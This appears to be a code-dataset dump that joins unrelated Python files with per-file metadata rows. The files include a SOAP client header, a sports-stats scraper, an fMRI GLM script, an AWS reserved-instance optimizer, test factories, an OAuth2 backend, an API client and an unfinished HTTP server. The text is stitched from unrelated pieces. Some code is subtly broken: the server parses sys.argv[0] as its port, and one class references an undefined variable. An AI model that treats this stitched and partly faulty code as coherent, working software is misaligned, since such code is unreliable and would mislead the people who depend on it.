# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
Suds is a lightweight SOAP python client that provides a
service proxy for Web Services.
"""
import os
import sys
#
# Project properties
#
__version__ = '0.4.unomena.2'
__build__="GA R699-20100913"
#
# Exceptions
#
class MethodNotFound(Exception):
def __init__(self, name):
Exception.__init__(self, "Method not found: '%s'" % name)
class PortNotFound(Exception):
def __init__(self, name):
Exception.__init__(self, "Port not found: '%s'" % name)
class ServiceNotFound(Exception):
def __init__(self, name):
Exception.__init__(self, "Service not found: '%s'" % name)
class TypeNotFound(Exception):
def __init__(self, name):
Exception.__init__(self, "Type not found: '%s'" % tostr(name))
class BuildError(Exception):
msg = \
"""
An error occured while building a instance of (%s). As a result
the object you requested could not be constructed. It is recommended
that you construct the type manually using a Suds object.
Please open a ticket with a description of this error.
Reason: %s
"""
def __init__(self, name, exception):
Exception.__init__(self, BuildError.msg % (name, exception))
class SoapHeadersNotPermitted(Exception):
msg = \
"""
Method (%s) was invoked with SOAP headers. The WSDL does not
define SOAP headers for this method. Retry without the soapheaders
keyword argument.
"""
def __init__(self, name):
Exception.__init__(self, self.msg % name)
class WebFault(Exception):
def __init__(self, fault, document):
if hasattr(fault, 'faultstring'):
Exception.__init__(self, "Server raised fault: '%s'" % fault.faultstring)
self.fault = fault
self.document = document
#
# Logging
#
class Repr:
def __init__(self, x):
self.x = x
def __str__(self):
return repr(self.x)
#
# Utility
#
def tostr(object, encoding=None):
""" get a unicode safe string representation of an object """
if isinstance(object, basestring):
if encoding is None:
return object
else:
return object.encode(encoding)
if isinstance(object, tuple):
s = ['(']
for item in object:
if isinstance(item, basestring):
s.append(item)
else:
s.append(tostr(item))
s.append(', ')
s.append(')')
return ''.join(s)
if isinstance(object, list):
s = ['[']
for item in object:
if isinstance(item, basestring):
s.append(item)
else:
s.append(tostr(item))
s.append(', ')
s.append(']')
return ''.join(s)
if isinstance(object, dict):
s = ['{']
for item in object.items():
if isinstance(item[0], basestring):
s.append(item[0])
else:
s.append(tostr(item[0]))
s.append(' = ')
if isinstance(item[1], basestring):
s.append(item[1])
else:
s.append(tostr(item[1]))
s.append(', ')
s.append('}')
return ''.join(s)
try:
return unicode(object)
except:
return str(object)
class null:
"""
The I{null} object.
Used to pass NULL for optional XML nodes.
"""
pass
def objid(obj):
return obj.__class__.__name__\
+':'+hex(id(obj))
import client
|
lgpl-3.0
| -8,721,852,589,140,907,000
| 27.597403
| 85
| 0.581971
| false
| 3.97832
| false
| false
| false
|
meprogrammerguy/pyMadness
|
scrape_stats.py
|
1
|
2098
|
#!/usr/bin/env python3
from urllib.request import urlopen
from bs4 import BeautifulSoup
import pandas as pd
import html5lib
import pdb
from collections import OrderedDict
import json
import csv
import contextlib
url = "https://kenpom.com/index.php"
#url = "https://kenpom.com/index.php?y=2017" #past year testing override
print ("Scrape Statistics Tool")
print ("**************************")
print ("data is from {0}".format(url))
print ("**************************")
with contextlib.closing(urlopen(url)) as page:
soup = BeautifulSoup(page, "html5lib")
ratings_table=soup.find('table', id='ratings-table')
IDX=[]
A=[]
B=[]
C=[]
D=[]
E=[]
F=[]
G=[]
H=[]
I=[]
J=[]
K=[]
L=[]
M=[]
index=0
for row in ratings_table.findAll("tr"):
col=row.findAll('td')
if len(col)>0:
index+=1
IDX.append(index)
A.append(col[0].find(text=True))
B.append(col[1].find(text=True))
C.append(col[2].find(text=True))
D.append(col[3].find(text=True))
E.append(col[4].find(text=True))
F.append(col[5].find(text=True))
G.append(col[7].find(text=True))
H.append(col[9].find(text=True))
I.append(col[11].find(text=True))
J.append(col[13].find(text=True))
K.append(col[15].find(text=True))
L.append(col[17].find(text=True))
M.append(col[19].find(text=True))
df=pd.DataFrame(IDX,columns=['Index'])
df['Rank']=A
df['Team']=B
df['Conf']=C
df['W-L']=D
df['AdjEM']=E
df['AdjO']=F
df['AdjD']=G
df['AdjT']=H
df['Luck']=I
df['AdjEMSOS']=J
df['OppOSOS']=K
df['OppDSOS']=L
df['AdjEMNCSOS']=M
with open('stats.json', 'w') as f:
f.write(df.to_json(orient='index'))
with open("stats.json") as stats_json:
dict_stats = json.load(stats_json, object_pairs_hook=OrderedDict)
stats_sheet = open('stats.csv', 'w', newline='')
csvwriter = csv.writer(stats_sheet)
count = 0
for row in dict_stats.values():
#pdb.set_trace()
if (count == 0):
header = row.keys()
csvwriter.writerow(header)
count += 1
csvwriter.writerow(row.values())
stats_sheet.close()
print ("done.")
|
mit
| -3,005,067,790,104,389,600
| 22.054945
| 72
| 0.609152
| false
| 2.838972
| false
| false
| false
|
berkeley-stat159/project-alpha
|
code/utils/scripts/glm_script.py
|
1
|
3957
|
""" Script for GLM functions.
Run with:
python glm_script.py
"""
# Loading modules.
from __future__ import absolute_import, division, print_function
import numpy as np
import matplotlib.pyplot as plt
import nibabel as nib
import os
import sys
# Relative paths to subject 1 data.
project_path = "../../../"
pathtodata = project_path + "data/ds009/sub001/"
condition_location = pathtodata+"model/model001/onsets/task001_run001/"
location_of_images = project_path+"images/"
location_of_functions = project_path+"code/utils/functions/"
sys.path.append(location_of_functions)
# Load events2neural from the stimuli module.
from stimuli import events2neural
from event_related_fMRI_functions import hrf_single, convolution_specialized
# Load our GLM functions.
from glm import glm, glm_diagnostics, glm_multiple
# Load the image data for subject 1.
img = nib.load(pathtodata+"BOLD/task001_run001/bold.nii.gz")
data = img.get_data()
data = data[...,6:] # Knock off the first 6 observations.
cond1=np.loadtxt(condition_location+"cond001.txt")
cond2=np.loadtxt(condition_location+"cond002.txt")
cond3=np.loadtxt(condition_location+"cond003.txt")
#######################
# a. (my) convolution #
#######################
all_stimuli=np.array(sorted(list(cond2[:,0])+list(cond3[:,0])+list(cond1[:,0]))) # could also just x_s_array
my_hrf = convolution_specialized(all_stimuli,np.ones(len(all_stimuli)),hrf_single,np.linspace(0,239*2-2,239))
##################
# b. np.convolve #
##################
# initial needed values
TR = 2
tr_times = np.arange(0, 30, TR)
hrf_at_trs = np.array([hrf_single(x) for x in tr_times])
n_vols=data.shape[-1]
# creating the .txt file for the events2neural function
cond_all=np.row_stack((cond1,cond2,cond3))
cond_all=sorted(cond_all,key= lambda x:x[0])
np.savetxt(condition_location+"cond_all.txt",cond_all)
neural_prediction = events2neural(condition_location+"cond_all.txt",TR,n_vols)
convolved = np.convolve(neural_prediction, hrf_at_trs) # hrf_at_trs sample data
N = len(neural_prediction) # N == n_vols == 173
M = len(hrf_at_trs) # M == 12
np_hrf=convolved[:N]
#############################
#############################
# Analysis and diagonistics #
#############################
#############################
#######################
# a. (my) convolution #
#######################
# Now get the estimated coefficients and design matrix for doing
# regression on the convolved time course.
B_my, X_my = glm(data, my_hrf)
# Some diagnostics.
MRSS_my, fitted_my, residuals_my = glm_diagnostics(B_my, X_my, data)
# Print out the mean MRSS.
print("MRSS using 'my' convolution function: "+str(np.mean(MRSS_my)))
# Plot the time course for a single voxel with the fitted values.
# Looks pretty bad.
plt.plot(data[41, 47, 2]) #change from cherry-picking
plt.plot(fitted_my[41, 47, 2])
plt.savefig(location_of_images+"glm_plot_my.png")
plt.close()
##################
# b. np.convolve #
##################
# Now get the estimated coefficients and design matrix for doing
# regression on the convolved time course.
B_np, X_np = glm(data, np_hrf)
# Some diagnostics.
MRSS_np, fitted_np, residuals_np = glm_diagnostics(B_np, X_np, data)
# Print out the mean MRSS.
print("MRSS using np convolution function: "+str(np.mean(MRSS_np)))
# Plot the time course for a single voxel with the fitted values.
# Looks pretty bad.
plt.plot(data[41, 47, 2])
plt.plot(fitted_np[41, 47, 2])
plt.savefig(location_of_images+"glm_plot_np.png")
plt.close()
X_my3=np.ones((data.shape[-1],4))
for i in range(2):
X_my3[:,i+1]=my_hrf**(i+1)
B_my3, X_my3 = glm_multiple(data, X_my3)
MRSS_my3, fitted_my3, residuals_my3 = glm_diagnostics(B_my3, X_my3, data)
print("MRSS using 'my' convolution function, 3rd degree polynomial: "+str(np.mean(MRSS_my3))+ ", but the chart looks better")
plt.plot(data[41, 47, 2])
plt.plot(fitted_my3[41, 47, 2])
plt.savefig(location_of_images+"glm_plot_my3.png")
plt.close()
|
bsd-3-clause
| -381,920,970,145,549,500
| 28.75188
| 125
| 0.664645
| false
| 2.854978
| false
| false
| false
|
dbatalov/ri-optimizer
|
example_main.py
|
1
|
9032
|
"""
This is the main example script to execute, it is meant as an example
of how the riptimize.py module is to be used, and effectivey acts as
the driver of the module with rudimentary console UI + CSV report
generation and S3 upload. It's job is to demonstrate the functionality
of riptimize and it is not meant to execute in production as is.
The step-by-step instructions as to how to execute this script is
embedded in comments below labeled with STEP X OF X.
"""
import riptimize
import datetime
import csv
import boto
def main():
print "Example Riptimize Driver"
print
# 1. setup
# STEP 1 of 7: specify region
region = 'us-east-1'
# STEP 2 of 7: set the RI holding account id and credentials
ri_account_id = 'RIRI-RIRI-RIRI' # replace with actual AWS Account ID
ri_account_credentials = ('<access-key-id-ri>', '<secret_access-key-ri>')
all_accounts = {ri_account_id: ri_account_credentials}
# STEP 3 of 7: add ids and credentials for all other linked accounts, at first just add a couple other accounts
# all_accounts['AAAA-AAAA-AAAA'] = ('<access-key-id-a>', '<secret-access-key-a>')
# all_accounts['BBBB-BBBB-BBBB'] = ('<access-key-id-b>', '<secret-access-key-b>')
# ...
# all_accounts['ZZZZ-ZZZZ-ZZZZ'] = ('<access-key-id-z>', '<secret-access-key-z>')
# STEP 4 of 7: For the first few tests this should be set to False
# once you see that the script is running, change to True to actually execute RI modifications
optimize = False # if False, means a DRY-RUN
# STEP 5 of 7: Leaving as True will publish RI surplus metrics to CloudWatch
publish_metrics = True # custom metrics are created in AWS CloudWatch
# STEP 6 of 7: Leaving as True will upload the CSV report to S3 for safekeeping
upload_report = True # CSV reports will be saved in S3 in s3_report_bucket
s3_report_bucket = "riptimize-reports-%s" % ri_account_id
# 2. do it
# STEP 7 of 7: Ok, you are ready to go, just execute on the command line % python example_main.py
riptimize_result_tuple = riptimize.riptimize(all_accounts, ri_account_credentials, region, optimize, publish_metrics)
# 3. show results
i_inventory, i_inventory_by_account, ri_inventory, supported_ri_zones, processing_modifications, clean_mismatch, recommendations, plan, modification_ids = riptimize_result_tuple
time_now = datetime.datetime.utcnow()
print "Report for region %s as of %s" % (region, time_now)
print
# 3.1 print on-demand instance inventory
print "Instance Inventory by account:"
print i_inventory_by_account
print
print "Aggregate instance inventory:"
print i_inventory
print
# 3.2 print RI inventory
print "RI Inventory:"
print ri_inventory
print
# 3.3 show all supported AZs in the RI holding account
print "Supported RI zones: " + str(supported_ri_zones)
# 3.4 show if previous modifications are still being executed
modifications_inflight = len(processing_modifications) != 0
if modifications_inflight:
print
print "======--- WARNING ---======"
print "Previous modifications are still processing:"
for mod in processing_modifications:
print "modification_id: %s, status: %s" % (mod.modification_id, mod.status)
print "!!! RI optimizations cannot be performed until previous modifications are completed"
print "!!! RI inventory and recommendations will also be potentially incorrect"
print
# 3.5 print detected mismatches between numbers of on-demand running instances and RIs by availability zone and instance type
if len(clean_mismatch) > 0:
print "On-demand/RI inventory mismatches per availability zone:"
print clean_mismatch
else:
print "No On-demand/RI inventory mimatches detected in any availability zones:"
print
# 3.6 print recommendations for migrating running instances into AZs covered by RI holding account, purchasing additional RIs or launching additional instances to get better RI utilization
eliminated_i_inventory, ri_imbalance = recommendations
if len(eliminated_i_inventory) == 0 and len(ri_imbalance) == 0:
print "No recomendations available"
else:
print "Recommendations:"
if len(eliminated_i_inventory) > 0:
print "\tOn-demand instances running in zones not supported by RIs. Migrate them to supported zones:"
print "\t" + str(eliminated_i_inventory)
print
if len(ri_imbalance) > 0:
print "\tOn-demand/RI imbalance detected!"
print "\tNegative numbers indicate additional RIs needed, positive ones indicate that RIs are underutilized and more instances can be launched:"
print "\t" + str(ri_imbalance)
print
# 3.7 print high-level optimization plan if one is possible, showing how many RIs need to be moved to which AZs
if len(plan) == 0:
print "No RI redistribution is possible."
else:
print "RI Optimization possible! Plan: " + str(plan)
if optimize:
if modifications_inflight:
print "Previous optimizations are still processing, new optimizations kicked off in DRY-RUN mode only!"
else:
print "Optimize option selected, optimizations kicked-off..."
else:
print "Optimize flag not set, so optimizations kicked off in DRY-RUN mode only!"
print
# 3.8 finally, if optimizations were actually kicked off, list all modification ids, or fake ones in case of a dry run
print "Initiated optimizations:"
print modification_ids
filename_safe_timestamp = str(time_now).replace(' ','_').replace(':', '-')
report_file_name = "riptimize_report_%s_%s.csv" % (region, filename_safe_timestamp)
csv_report(report_file_name, time_now, region, i_inventory_by_account, ri_inventory, clean_mismatch, plan, modification_ids)
print
print "CSV report written to %s" % report_file_name
if upload_report:
upload_report_to_s3(ri_account_credentials, report_file_name, s3_report_bucket)
print
print "Report uploaded to S3 as %s/%s of RI holding account %s" % (s3_report_bucket, report_file_name, ri_account_id)
print
print "Done"
# exapmle of generating a CSV report
def csv_report(csv_file_name, time_now, region, i_inventory_by_account, ri_inventory, clean_mismatch, plan, modification_ids):
with open(csv_file_name, 'wb') as csv_file:
writer = csv.writer(csv_file)
writer.writerow(["Report for region %s at %s" % (region, str(time_now))])
# write instance inventory report
writer.writerow([])
writer.writerow(['Instance Inventory'])
writer.writerow(['Account ID', 'Instance Type', 'Availability Zone', 'Count'])
for account_id, inventory_for_account in i_inventory_by_account.items():
for (itype, az), count in inventory_for_account.items():
writer.writerow([account_id, itype, az, count])
# write RI inventory report
writer.writerow([])
writer.writerow(['RI Inventory'])
writer.writerow(['Instance Type', 'Availability Zone', 'Count'])
for (itype, az), count in ri_inventory.items():
writer.writerow([itype, az, count])
# write report on On-demand/RI inventory mismatches
writer.writerow([])
writer.writerow(['On-demand/RI inventory mismatches per each availability zone'])
writer.writerow(['Instance Type', 'Availability Zone', 'Diff'])
for (itype, az), count in clean_mismatch.items():
writer.writerow([itype, az, count])
# write optimization plan
writer.writerow([])
writer.writerow(['RI modification plan'])
writer.writerow(['Instance Type', 'Source AZ', 'Destination AZ', 'Count'])
for itype, source_az, dest_az, count in plan:
writer.writerow([itype, source_az, dest_az, count])
# write modification_ids
writer.writerow([])
writer.writerow(['Kicked off RI modifications'])
writer.writerow(['Modification ID'])
for modification_id in modification_ids:
writer.writerow([modification_id])
def upload_report_to_s3(ri_account_credentials, report_file_name, s3_report_bucket):
access_key_id, secret_access_key = ri_account_credentials
s3 = boto.connect_s3(aws_access_key_id=access_key_id, aws_secret_access_key=secret_access_key)
# create bucket if does not exist
bucket = s3.lookup(s3_report_bucket)
if not bucket:
bucket = s3.create_bucket(s3_report_bucket)
# upload the report
key = bucket.new_key(report_file_name)
key.set_contents_from_filename(report_file_name)
s3.close()
if __name__ == '__main__':
main()
|
bsd-2-clause
| -7,441,872,143,540,658,000
| 46.042553
| 192
| 0.660762
| false
| 3.884731
| false
| false
| false
|
EKiefer/edge-starter
|
py34env/Scripts/enhancer.py
|
1
|
1558
|
#!c:\users\ekiefer\projects\django\my_edge\py34env\scripts\python.exe
#
# The Python Imaging Library
# $Id$
#
# this demo script creates four windows containing an image and a slider.
# drag the slider to modify the image.
#
try:
from tkinter import Tk, Toplevel, Frame, Label, Scale, HORIZONTAL
except ImportError:
from Tkinter import Tk, Toplevel, Frame, Label, Scale, HORIZONTAL
from PIL import Image, ImageTk, ImageEnhance
import sys
#
# enhancer widget
class Enhance(Frame):
def __init__(self, master, image, name, enhancer, lo, hi):
Frame.__init__(self, master)
# set up the image
self.tkim = ImageTk.PhotoImage(image.mode, image.size)
self.enhancer = enhancer(image)
self.update("1.0") # normalize
# image window
Label(self, image=self.tkim).pack()
# scale
s = Scale(self, label=name, orient=HORIZONTAL,
from_=lo, to=hi, resolution=0.01,
command=self.update)
s.set(self.value)
s.pack()
def update(self, value):
self.value = eval(value)
self.tkim.paste(self.enhancer.enhance(self.value))
#
# main
root = Tk()
im = Image.open(sys.argv[1])
im.thumbnail((200, 200))
Enhance(root, im, "Color", ImageEnhance.Color, 0.0, 4.0).pack()
Enhance(Toplevel(), im, "Sharpness", ImageEnhance.Sharpness, -2.0, 2.0).pack()
Enhance(Toplevel(), im, "Brightness", ImageEnhance.Brightness, -1.0, 3.0).pack()
Enhance(Toplevel(), im, "Contrast", ImageEnhance.Contrast, -1.0, 3.0).pack()
root.mainloop()
|
mit
| 8,260,503,957,191,499,000
| 25.40678
| 80
| 0.646341
| false
| 3.103586
| false
| false
| false
|
prasannav7/ggrc-core
|
test/integration/ggrc/models/factories.py
|
1
|
4323
|
# Copyright (C) 2013 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: dan@reciprocitylabs.com
# Maintained By: urban@reciprocitylabs.com
"""Factories for models"""
import random
import factory
from ggrc import db
from ggrc import models
def random_string(prefix=''):
return '{prefix}{suffix}'.format(
prefix=prefix,
suffix=random.randint(0, 9999999999),
)
class ModelFactory(factory.Factory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
# modified_by_id = 1
@classmethod
def _create(cls, target_class, *args, **kwargs):
instance = target_class(*args, **kwargs)
db.session.add(instance)
db.session.commit()
return instance
class TitledFactory(factory.Factory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
title = factory.LazyAttribute(lambda m: random_string('title'))
class DirectiveFactory(ModelFactory, TitledFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Directive
class ControlFactory(ModelFactory, TitledFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Control
directive = factory.SubFactory(DirectiveFactory)
kind_id = None
version = None
documentation_description = None
verify_frequency_id = None
fraud_related = None
key_control = None
active = None
notes = None
class AssessmentFactory(ModelFactory, TitledFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Assessment
class ControlCategoryFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.ControlCategory
name = factory.LazyAttribute(lambda m: random_string('name'))
lft = None
rgt = None
scope_id = None
depth = None
required = None
class CategorizationFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Categorization
category = None
categorizable = None
category_id = None
categorizable_id = None
categorizable_type = None
class ProgramFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Program
title = factory.LazyAttribute(lambda _: random_string("program_title"))
slug = factory.LazyAttribute(lambda _: random_string(""))
class AuditFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Audit
title = factory.LazyAttribute(lambda _: random_string("title"))
slug = factory.LazyAttribute(lambda _: random_string(""))
status = "Planned"
program_id = factory.LazyAttribute(lambda _: ProgramFactory().id)
class ContractFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Contract
class EventFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Event
revisions = []
class RelationshipFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Relationship
source = None
destination = None
class RelationshipAttrFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.RelationshipAttr
relationship_id = None
attr_name = None
attr_value = None
class PersonFactory(ModelFactory):
# pylint: disable=too-few-public-methods,missing-docstring,old-style-class
# pylint: disable=no-init
class Meta:
model = models.Person
|
apache-2.0
| -2,486,109,641,783,697,400
| 23.844828
| 78
| 0.734906
| false
| 3.575682
| false
| false
| false
|
k0001/meaningtoolws
|
meaningtoolws/ct.py
|
1
|
4944
|
# -*- coding: utf-8 -*-
# Copyright (c) 2009, Popego Corporation <contact [at] popego [dot] com>
# All rights reserved.
#
# This file is part of the Meaningtool Web Services Python Client project
#
# See the COPYING file distributed with this project for its licensing terms.
"""
Meaningtool Category Tree REST API v0.1 client
Official documentation for the REST API v0.1 can be found at
http://meaningtool.com/docs/ws/ct/restv0.1
"""
import re
import urllib
import urllib2
try:
import json
except ImportError:
import simplejson as json
MT_BASE_URL = u"http://ws.meaningtool.com/ct/restv0.1"
_re_url = re.compile(ur"^https?://.+$")
class Result(object):
def __init__(self, status_errcode, status_message, data):
super(Result, self).__init__()
self.status_errcode = status_errno
self.status_message = status_message
self.data = data
def __repr__(self):
return u"<%s - %s>" % (self.__class__.__name__, self.status_message)
class ResultError(Result, Exception):
def __init__(self, status_errcode, status_message, data):
Result.__init__(self, status_errcode, status_message, data)
Exception.__init__(self, u"%s: %s" % (status_errcode, status_message))
def __repr__(self):
return u"<%s - %s: %s>" % (self.__class__.__name__, self.status_errcode, self.status_message)
class Client(object):
def __init__(self, ct_key):
self.ct_key = ct_key
self._base_url = u"%s/%s" % (MT_BASE_URL, ct_key)
def __repr__(self):
return u"<%s - ct_key: %s>" % (self.__class__.__name__, self.ct_key)
def _req_base(self, method, url, data, headers):
if method == "GET":
req = urllib2.Request(u"%s?%s" % (url, urllib.urlencode(data)))
elif method == "POST":
req = urllib2.Request(url, urllib.urlencode(data))
else:
raise ValueError(u"HTTP Method '%s' not supported" % method)
req.add_header("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8")
req.add_header("Accept-Charset", "UTF-8")
for k,v in headers:
req.add_header(k, v)
try:
resp = urllib2.urlopen(req)
except urllib2.HTTPError, e:
if e.code >= 500:
raise
resp = e
s = resp.read()
return s
def _req_json(self, method, url, data, headers):
url += u'.json'
headers.append(("Accept", "application/json"))
return self._req_base(method, url, data, headers)
def _parse_result_base(self, result_dict):
status = result_dict["status"]
status_errcode = result_dict["errno"]
status_message = result_dict["message"]
data = result_dict["data"]
if status == "ok":
return Result(status_errcode, status_message, data)
else:
raise ResultError(status_errcode, status_message, data)
def _parse_result_json(self, raw):
return self._parse_result_base(json.loads(raw, encoding="utf8"))
# default request/parse methods
_req = _req_json
_parse_result = _parse_result_json
def get_categories(self, source, input, url_hint=None, additionals=None, content_language=None):
url = u"%s/categories" % self._base_url
data = {}
headers = []
data["source"] = source.encode("utf8")
data["input"] = input.encode("utf8")
if url_hint:
if not _re_url.match(url_hint):
raise ValueError(u"url_hint")
data["url_hint"] = url_hint.encode("utf8")
if additionals:
additionals = u",".join(set(additionals))
data["additionals"] = additionals.encode("utf8")
if content_language:
content_language = content_language[:2].lower()
if not len(content_language) == 2:
raise ValueError(u"content_language")
headers.append(("Content-Language", content_language.encode("ascii")))
# Even if POST, it's idempotent as GET.
return self._parse_result(self._req("POST", url, data, headers))
def get_tags(self, source, input, url_hint=None, content_language=None):
url = u"%s/tags" % self._base_url
data = {}
headers = []
data["source"] = source.encode("utf8")
data["input"] = input.encode("utf8")
if url_hint:
if not _re_url.match(url_hint):
raise ValueError(u"url_hint")
data["url_hint"] = url_hint.encode("utf8")
if content_language:
content_language = content_language[:2].lower()
if not len(content_language) == 2:
raise ValueError(u"content_language")
headers.append(("Content-Language", content_language.encode("ascii")))
# Even if POST, it's idempotent as GET.
return self._parse_result(self._req("POST", url, data, headers))
|
bsd-3-clause
| 6,838,378,754,736,598,000
| 32.405405
| 101
| 0.587379
| false
| 3.624633
| false
| false
| false
|
proversity-org/edx-platform
|
lms/djangoapps/student_account/talenetic.py
|
1
|
7807
|
from six.moves.urllib_parse import urlencode, unquote
import jwt
import json
from django.conf import settings
from student.models import Registration, UserProfile
from social_core.backends.oauth import BaseOAuth2
from django.contrib.auth.models import User
import uuid
import logging
import social_django
log = logging.getLogger(__name__)
class TaleneticOAuth2(BaseOAuth2):
"""
Talenetic OAuth2 authentication backend
"""
settings_dict = settings.CUSTOM_BACKENDS.get('talenetic')
name = 'talenetic-oauth2'
REDIRECT_STATE = False
ID_KEY = 'emailaddress'
STATE_PARAMETER = False
AUTHORIZATION_URL = settings_dict.get('AUTH_URL')
ACCESS_TOKEN_URL = settings_dict.get('ACCESS_TOKEN_URL')
ACCESS_TOKEN_METHOD = 'GET'
REFRESH_TOKEN_URL = settings_dict.get('REFRESH_TOKEN_URL')
REFRESH_TOKEN_METHOD = 'POST'
RESPONSE_TYPE = 'code jwt_token'
REDIRECT_IS_HTTPS = False
REVOKE_TOKEN_URL = settings_dict.get('LOGOUT_URL')
REVOKE_TOKEN_METHOD = 'POST'
def get_scope_argument(self):
return {}
def auth_complete(self, *args, **kwargs):
"""Completes login process, must return user instance"""
self.process_error(self.data)
state = self.validate_state()
access_url = "{}?uid={}".format(self.access_token_url(), self._get_uid())
response = self.request_access_token(
access_url,
data=self._get_creds(),
headers=self._get_creds(),
auth=self.auth_complete_credentials(),
method=self.ACCESS_TOKEN_METHOD
)
self.process_error(response)
return self.do_auth(response['jwt_token'], response=response,
*args, **kwargs)
def do_auth(self, jwt_token, *args, **kwargs):
data = self.user_data(jwt_token, *args, **kwargs)
response = kwargs.get('response') or {}
response.update(data or {})
if 'access_token' not in response:
response['access_token'] = jwt_token
kwargs.update({'response': response, 'backend': self})
return self.strategy.authenticate(*args, **kwargs)
def _get_uid(self):
if 'uid' in self.data:
return self.data['uid']
else:
return None
def auth_params(self, state=None):
client_id, client_secret = self.get_key_and_secret()
uri = self.get_redirect_uri(state)
if self.REDIRECT_IS_HTTPS:
uri = uri.replace('http://', 'https://')
params = {
'urlredirect': uri,
'clientId': client_id,
'secretkey': client_secret
}
return params
def get_user_id(self, details, response):
return details.get('email')
def user_data(self, access_token, *args, **kwargs):
"""Loads user data from service"""
return self.get_user_details(kwargs.get('response'))
def get_user_details(self, response):
response = self._fill_fields(response)
self._set_uid_to_profile(self._get_uid(), response.get('emailaddress'))
return {'username': response.get('username'),
'email': response.get('emailaddress'),
'fullname': response.get('firstname'),
'first_name': response.get('firstname')}
def _fill_fields(self, data):
# a little util to fill in missing data for later consumption
if data.get('firstname') is None:
data['firstname'] = data.get('emailaddress').split('@')[0]
if data.get('username') is None:
data['username'] = data.get('emailaddress').split('@')[0]
return data
def _get_creds(self):
client_id, client_secret = self.get_key_and_secret()
return {
'secretkey': client_secret,
'clientId': client_id
}
def auth_headers(self):
return {'Accept': 'application/json'}
def pipeline(self, pipeline, pipeline_index=0, *args, **kwargs):
"""
This is a special override of the pipeline method.
This will grab the user from the actual ran pipeline and
add the incoming uid as a uid field to the meta field on the user profile
"""
# due to some of the usernames that will come in from the SSO containing a .fullstop
# the user can not be found and then the oauth tries
# to make a new one and breaks as the email exists,
# this is to set the user if it exists forcefully for the rest of oauth to work properly.
if kwargs.get('user') is None:
try:
user = User.objects.get(email=kwargs.get('response').get('emailaddress'))
kwargs['user'] = user
except User.DoesNotExist:
pass
out = self.run_pipeline(pipeline, pipeline_index, *args, **kwargs)
if not isinstance(out, dict):
return out
user = out.get('user')
if user:
user.social_user = out.get('social')
user.is_new = out.get('is_new')
return user
def _set_uid_to_profile(self, uid, emailaddress):
"""
This function calls for the existing user by emailaddress,
if the user is found we save the requested uid to the user profile
because we need it to logout.
"""
try:
user = User.objects.get(email=emailaddress)
user_profile = user.profile
new_meta = {'talenetic-uid': uid}
if len(user_profile.meta) > 0:
previous_meta = json.loads(user_profile.meta)
mixed_dicts =\
(previous_meta.items() + new_meta.items())
new_meta =\
{key: value for (key, value) in mixed_dicts}
user_profile.meta = json.dumps(new_meta)
user_profile.save()
except Exception as e:
log.error("Could not save uid to user profile or something else: {}".format(e.message))
def auth_url(self):
"""Return redirect url"""
params = self.auth_params()
params = urlencode(params)
if not self.REDIRECT_STATE:
# redirect_uri matching is strictly enforced, so match the
# providers value exactly.
params = unquote(params)
return '{0}?{1}'.format(self.authorization_url(), params)
def revoke_token_url(self, token, uid):
social_user = social_django.models.DjangoStorage.user.get_social_auth(provider=self.name, uid=uid)
profile = social_user.user.profile
meta_data = json.loads(profile.meta)
url = "{}?uid={}".format(self.REVOKE_TOKEN_URL, meta_data.get('talenetic-uid'))
return url
def revoke_token_params(self, token, uid):
return {}
def revoke_token_headers(self, token, uid):
return self._get_creds()
def process_revoke_token_response(self, response):
return response.status_code == 200
def revoke_token(self, token, uid):
if self.REVOKE_TOKEN_URL:
url = self.revoke_token_url(token, uid)
params = self.revoke_token_params(token, uid)
headers = self.revoke_token_headers(token, uid)
data = urlencode(params) if self.REVOKE_TOKEN_METHOD != 'GET' \
else None
response = self.request(url, params=params, headers=headers,
data=data, method=self.REVOKE_TOKEN_METHOD)
return self.process_revoke_token_response(response)
|
agpl-3.0
| 211,726,550,094,709,500
| 33.166667
| 106
| 0.575893
| false
| 4.096013
| false
| false
| false
|
denis-guillemenot/pmi_collect
|
simpleHTTPServer.py
|
1
|
1587
|
# ----------------------------------------------------------------
# name : simpleHTTPServer.py
# object: Simple MultiThreaded Web Server
# usage: python SimpleHTTPServer [port] / default port: 8080
# author: denis_guillemenot@fr.ibm.com / denis.guillemenot@gmail.com
# date : 19/09/2013
# ----------------------------------------------------------------
import sys
# Use default or provided port
print
if ( len( sys.argv) > 0):
msg = "provided"
try:
cause = "must be an integer"
port = int( sys.argv[0])
if ( port < 1024):
cause = "must be =< 1024"
raise
except:
print "ERROR: %s port:%s %s... exiting" % (msg, sys.argv[0], cause)
sys.exit( 1)
else:
msg = "default"
port = 8080
print "Using %s port:%d" % ( msg, port)
import SocketServer, BaseHTTPServer, sys, os, CGIHTTPServer, os, os.path
# port = 8080
